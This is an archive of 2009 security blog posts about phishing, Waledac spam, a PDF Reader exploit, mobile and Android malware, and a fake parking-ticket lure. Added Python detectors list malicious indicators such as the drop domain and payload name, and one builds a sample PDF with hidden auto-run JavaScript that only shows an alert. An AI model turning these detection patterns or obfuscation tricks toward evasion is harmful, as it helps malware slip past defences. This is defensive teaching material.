Thursday, February 26, 2009

A Middle Finger from the Abbey

A 19-year-old man in Bristol, England has been banned from having a bank account after falling victim to an email scam. Billy Brown received an email claiming to be from his bank, Abbey of the UK, apparently asking for his account details. Soon after, a check for £8,200 showed up in his bank account, and shortly after that the same amount was withdrawn. As it turned out, the bank allowed the withdrawal before the check had even cleared, which it never did, leaving Mr. Brown's account overdrawn by the same £8,200. That's pretty huge, especially for a 19-year-old. So, what did his bank do to help? It accused him of being at fault, closed his account and blacklisted his credit rating. Thanks to this blacklisting, no other bank will even allow him to open an account. This is causing other serious problems, as the supermarket where he works only pays by direct deposit into a bank account, so now he isn't getting paid either. Billy Brown denies ever having given up any of his credentials, but the bank argues otherwise, claiming that it's his own fault. Strangely enough, they refuse to explain why they allowed a withdrawal of that much quid without first verifying that the check was good. Even though he is young, and possibly naive (though I've never met this gentleman, I am just generalizing), I don't believe that this bank should ruin the financial life of someone this young and claim none of the fault. Maybe if they tightened up their practices a little, this wouldn't have happened whether Mr. Brown had given the bad guys his info or not.
Regardless, he has now taken on a lawyer after being rejected for a new account by every major bank, including Lloyds, HSBC, Barclays, Halifax and NatWest. Nationwide Building Society told him it might be able to offer a basic account without a card he could use in cash machines or shops, meaning he'd have to withdraw any money over the counter.

Tuesday, February 24, 2009

Waledac's Look du Jour

The Waledac worm, which is the Storm Worm reborn, is back with a new look. First it arrives in your inbox offering to save you money, with subject lines such as these (among several others):
A special discount voucher listing
I hope it will be useful for you
Exclusive coupons
All discounts in your city
Save up to 90%!!!!
I want you to save your money
The body of the email is short and sweet, with lines such as these (there are many variations):
Best shops with sale
Buy and save money with these coupons
Hot deals in your city
Want to save money? Look at this!
I sent you useful listing
I found a fantastic bargain
Look,
I've found fantastic sale

These come along with a link to one of various websites that carry the payload. The sites use a printable-coupon theme and look up your IP address so the page can be tailored to your locality, making it look more personal and legitimate.
Every link on this landing page points towards the download of a file named sale.exe, but you don't need to click a link in order to be infected: there is also a hidden iframe that attempts to pull malicious binaries from a site called chatloveonline.com, which is of course hosted on a fast-flux network.
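As an added example (not code from the original post), here is a small Python triage that checks a mail for the lure lines quoted above and a fetched landing page for the two traits described: links pointing at sale.exe and a hidden iframe loading from chatloveonline.com. The sample mail and page are constructed, and the regexes and the zero-size/CSS-hidden frame heuristic are my assumptions about how such a page is built.

```python
"""Triage for the Waledac 'coupon' lure described above (added example, constructed samples)."""
import re
from email import message_from_string

# Phrases and indicators quoted in the post.
SUBJECT_LURES = ("discount voucher", "exclusive coupons", "discounts in your city",
                 "save up to 90%", "save your money", "useful for you")
BODY_LURES = ("shops with sale", "coupons", "hot deals", "fantastic bargain",
              "fantastic sale", "useful listing", "save money")
DROP_DOMAIN = "chatloveonline.com"   # the fast-flux host named in the post
PAYLOAD_NAME = "sale.exe"
LINK_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"src\s*=\s*[\"']?([^\s\"'>]+)", re.I)
# Zero-size or CSS-hidden frame: the "hidden iframe" trait (assumed heuristic).
HIDDEN_RE = re.compile(r"(?:width|height)\s*=\s*[\"']?0\b|display\s*:\s*none|visibility\s*:\s*hidden", re.I)

def triage_email(raw: str) -> dict:
    """Match the lure subject/body lines and collect the links the mail carries."""
    msg = message_from_string(raw)
    subject = (msg.get("Subject") or "").lower()
    parts = msg.walk() if msg.is_multipart() else [msg]
    body = "\n".join(p.get_payload() for p in parts if p.get_content_type() == "text/plain")
    hits = []
    if any(s in subject for s in SUBJECT_LURES):
        hits.append("lure-subject")
    if any(b in body.lower() for b in BODY_LURES):
        hits.append("lure-body")
    links = LINK_RE.findall(body)
    if links:
        hits.append("external-link")
    return {"hits": hits, "links": links}

def triage_landing_page(html: str) -> dict:
    """Flag links to sale.exe and a hidden iframe that loads from the drop domain."""
    exe_links = [l for l in LINK_RE.findall(html) if l.lower().endswith(PAYLOAD_NAME)]
    hidden_drop_iframes = []
    for attrs in IFRAME_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src and HIDDEN_RE.search(attrs) and DROP_DOMAIN in src.group(1).lower():
            hidden_drop_iframes.append(src.group(1))
    return {"sale_exe_links": exe_links, "hidden_drop_iframes": hidden_drop_iframes,
            "malicious": bool(exe_links or hidden_drop_iframes)}

# Constructed samples (not captured traffic); example.invalid is a reserved, non-resolving name.
SAMPLE_EMAIL = "From: deals@example.invalid\nSubject: All discounts in your city\n\nHot deals in your city\nhttp://coupons.example.invalid/print.php\n"
SAMPLE_LANDING = ('<html><body><a href="http://coupons.example.invalid/sale.exe">Print coupon</a>'
                  '<iframe src="http://chatloveonline.com/in.php" width="0" height="0"></iframe>'
                  '</body></html>')
```

Run the landing-page check on HTML retrieved through a sandbox or proxy log, not from a user's browser, since fetching the page is itself the infection path the post describes.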

Friday, February 20, 2009

Another New PDF Exploit Found

According to many sources in the news this morning, Adobe's Portable Document Format (PDF) is being used to deliver malware once again. Attackers are creating specially crafted PDF documents that exploit a vulnerability in Adobe Reader and drop malicious files onto your hard drive. The dropped files vary, and the attacks currently appear targeted at high-ranking individuals in various organizations, but with Adobe announcing that it won't release a patch until March 11th, it's very likely that this flaw will be used widely in the wild very shortly.
It is highly recommended that you turn off JavaScript in Adobe Reader at least until the patch comes out, and certainly avoid opening any .pdf documents from unknown sources.
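As an added example, not from the original post, here is a Python triage for the active content this post tells readers to switch off: it reports risky PDF names (/JavaScript, /JS, /OpenAction and the like), inflating FlateDecode streams and resolving name escapes such as /J#61vaScript that a plain grep would miss. The sample PDF is constructed for the demo and contains only a harmless app.alert(); the name list and the stream regex are my assumptions, not Adobe's or any vendor's detection logic.

```python
"""Static triage of a PDF for the active content the post above tells readers to switch off."""
import re
import zlib

# Name objects whose presence a triage should at least report (assumed list).
RISKY_NAMES = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile")
NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")           # /J#61vaScript -> /JavaScript
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)

def _unescape_names(data: bytes) -> bytes:
    """Resolve PDF name escapes so obfuscated names match the plain keyword."""
    return NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)

def _inflate_streams(data: bytes) -> bytes:
    """Inflate every Flate stream; content inside object streams is invisible otherwise."""
    out = []
    for m in STREAM_RE.finditer(data):
        try:
            # decompressobj tolerates a trailing byte eaten by the regex; zlib.error means not Flate.
            out.append(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            pass
    return b"\n".join(out)

def triage_pdf(data: bytes) -> dict:
    """Count risky names in the raw file and in its inflated streams."""
    if not data.startswith(b"%PDF-"):
        raise ValueError("not a PDF header")
    haystack = _unescape_names(data + b"\n" + _inflate_streams(data))
    found = {}
    for name in RISKY_NAMES:
        n = len(re.findall(re.escape(name.encode()) + rb"(?![A-Za-z])", haystack))
        if n:
            found[name] = n
    # JavaScript wired to run on open is the combination that needs no user interaction.
    auto_js = bool(found.get("/OpenAction") or found.get("/AA")) and \
        bool(found.get("/JavaScript") or found.get("/JS"))
    return {"found": found, "auto_js": auto_js, "suspicious": bool(found)}

def build_sample_pdf() -> bytes:
    """Constructed demo file (not an exploit): an /OpenAction whose JavaScript action sits in a
    compressed object stream with its name escaped, so a plain search for /JavaScript misses it."""
    objstm = zlib.compress(b"4 0 << /S /J#61vaScript /JS (app.alert('demo')) >>")
    return (b"%PDF-1.5\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
            b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
            b"3 0 obj << /Type /ObjStm /N 1 /First 4 /Filter /FlateDecode /Length "
            + str(len(objstm)).encode() + b" >>\nstream\n" + objstm + b"\nendstream\nendobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")
```

Streams using filters other than FlateDecode, and encrypted documents, are not inflated here, so a clean result is not proof that a file is safe.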

Thursday, February 19, 2009

Is there a Mobile Botnet in Our Future?

The SymbOS/Yxes.A! worm, now the second piece of mobile malware to hit the scene in 2009, is under investigation by the anti-virus companies Fortinet and F-Secure. This worm has raised suspicion that our mobile devices may be in danger of becoming part of a zombie network sometime in the future.
This piece of malware, also known as "Sexy View", is currently targeting devices running Symbian OS S60 3rd Edition (e.g. the Nokia 3250), but may run on a wider range of devices according to Fortinet.
The worm will likely show up as an SMS message with a link to install the software. It carries a valid certificate from Symbian to help it appear to be a legitimate application. After it installs, it collects all of the phone numbers on the infected device and repeatedly attempts to send SMS messages to them with a link to a malicious website where the recipients can infect themselves as well. In addition to this propagation technique, the worm also gathers other information about the infected user, such as the phone's serial number and subscription number, which is then sent to and stored on a remote computer, likely to be sold to other cybercriminals who purchase harvested information. This is a new version of an old practice, very similar to the directory harvest attacks of the past, where spam and malware campaigns would specifically collect valid email addresses with the intention of selling those lists to marketers and spammers (thin line there).
Ok, back to the botnet part. Given that this worm contacts and interacts with a remote server, it would theoretically be very easy for the remote server to issue commands back to the infected mobile device. Combine that with the worm's aggressive propagation technique, add a pinch of malice, and you've got yourself a cell phone botnet.
As technology advances and morphs (considering a phone used to be a phone, and nowadays they're just smaller computers that we happen to make phone calls on), so does the innovation of the bad guys. Luckily the fix is still the same as it's always been - prevention. Be smart and aware, and don't go installing random unknown software on your computers or your phones. It's never a good idea.

Thursday, February 12, 2009

ShmooCon Brings Android Exploit to Light

This past weekend hackers gathered in the nation's capital at the Wardman Park Marriott to share the latest and greatest in the hacker community. One talk, given by security researcher Charlie Miller of Independent Security Evaluators, brought attention to a vulnerability in the architecture of Google's Android that was so troubling that Miller advised avoiding Android's browser entirely until it is fixed. The vulnerability lies in Android's multimedia framework, which was written by a company called PacketVideo. Someone who took advantage of this security flaw would gain access to the credentials saved by the browser, which in turn would give them full access to browsing history and past transactions, whether they had been encrypted or not.
This is how the infection would play out: the bad guys would set up a bad website with the malicious code, or additionally infect legitimate sites that serve up Android apps, or even publish malicious faux applications themselves. Next they would lie in wait for the masses to hit the infected webpages on their own, or use a botnet to blast out an Android-themed, socially engineered spam campaign to victims' inboxes to lure them in. After that, anything that you had done in your Android browser are belong to us.
Miller contacted Google about the vulnerability back in January, but so far Google has not sent out a patch for it. The strange twist is that this doesn't mean a patch doesn't exist, because one has existed since February 7th; Google just hasn't sent it to anyone with its normal updates. It instead sits in Google's code repository, doing nothing for even the above-average G1 user. It's likely that Google will include this patch in its next update due to the press this exploit is currently getting (I would hope).
This type of exploit was destined to appear, as I reported in my 2009 forecast. Luckily, in this instance the good guys found it first, even though that doesn't really matter if Google isn't taking it upon itself to push out the patch. The bad guys often rely on these vulnerability releases to rush out malware designed specifically to exploit them before people have a chance to patch up. Look at the Conficker worm, which is the talk of the town: it was designed to exploit a vulnerability in Windows' Server Service that allows remote code execution. This vulnerability was quickly patched by Microsoft, however there are still a reported 5 - 20 million infected machines out there because the patch got there too late, or because people never received the patch, having likely turned off Windows' automatic update feature.
Thanks to ReadWriteWeb.

Wednesday, February 11, 2009

Waledac, Pushdo and Others Wish You a Happy Valentine's Day!

As you've likely noticed by now, the Valentine's Day themed spam campaigns are in full swing. Waledac (formerly Storm), Pushdo and Donbot are the big bots behind these nuisances. They all appear fairly similar when they reach your inbox: a plain text message with a link to the goodies. Each botnet at this point offers a little something different along with its spam. Donbot (kiss the ring) offers a little voyeurism with access to 24/7 sexcams, for a price of course. Pushdo is pushing male enhancement pills, and Storm, um, I mean Waledac, is serving up the cute puppies and something called a Valentine Devkit. The Devkit, short for development kit I'm assuming, is supposed to be a program that will help you make your sweetheart a cutesy online V-day card, or something like that. It's not really; in fact it's a bit of malicious software that will help the Waledac worm grow in numbers by recruiting your computer into its botnet militia. Waledac is certainly the most malicious of the bots serving up these V-Day themed emails, and with Waledac's relatively small numbers currently, it is not that widespread. I am going to take a guess that this botnet will continue to grow, however, and possibly rival the numbers it maintained in its former life as the Storm Worm.
So if you receive a Valentine's Greeting in your inbox, I'd send it back anyway, because even if it is real, I don't feel that digital eCards should cut it. Where are the flowers and candy?

Thursday, February 5, 2009

You Have Parked in a Malware Zone

This one certainly wins points for creativity. Lenny Zeltser of SANS and Savvis Security Consulting blogged about a malware sample he was analyzing that began as a fake parking ticket in the parking lots of Grand Forks, ND. Yes indeed, this guy did some real footwork in his attempt to distribute this piece of malware! The tickets read "PARKING VIOLATION This vehicle is in violation of standard parking regulations. To view pictures with information about your parking preferences, go to..." and then the website. Once the dirty violators got to the site, they would see pictures of other salt- and snow-covered vehicles from the area with the license plates blurred out, and a link to install what was called the "Picture Search Toolbar". This would in turn contact a remote site to download and install a BHO (Browser Helper Object) for IE. This trojan would eventually begin serving those familiar "you are infected" pop-ups urging you to run a "free" Antivirus 2009 scan of your PC. If you ran the scan, the same old same old would happen: the malware would tell you that you had to pay for the full antivirus product to remove all of the baddies from your PC.
The guy (I'm assuming) that passed out these fake tickets is likely trying to make some money by recruiting for his new PPI hobby. PPI, or Pay Per Install, is a way for malware authors to increase their spread by recruiting other people to help get their malicious programs installed. The link usually has a number specific to each particular person passing them out. These intermediaries get paid every time someone clicks on the link they provide their victims. It's usually somewhere between $.01 and $.60 per click, depending on the country where the install takes place, with U.S. infections fetching larger pay-outs.
This is the first time I have heard of someone actually doing footwork to increase their PPI profits; he's really working for it! Other popular PPI techniques include spamming (of course), or putting the malicious programs up on P2P sites posing as something else.

Wednesday, February 4, 2009

The One That Got Away

What may have been designed to raise awareness and teach a few lessons backfired on the Department of Justice after it sent a slew of fake phishing emails to its own employees. For the past two weeks, DOJ employees have been receiving emails from the "Thrift Savings Plan Account Coordinator" encouraging them to give up their login credentials in order to receive information about their 401(k) programs.
Apparently the Department of Justice has an aware group of employees, because they weren't fooled, and soon the entire DOJ was flooded with interoffice emails warning fellow employees about these malicious messages. In response, the DOJ calmed its employees down by informing them it was all a "hoax invented and distributed by DOJ to test employee security awareness."
Ok, so maybe it didn't necessarily backfire; perhaps it worked perfectly. Hats off to the DOJ employees for their vigilance.
Want the long version? Check the AP story here.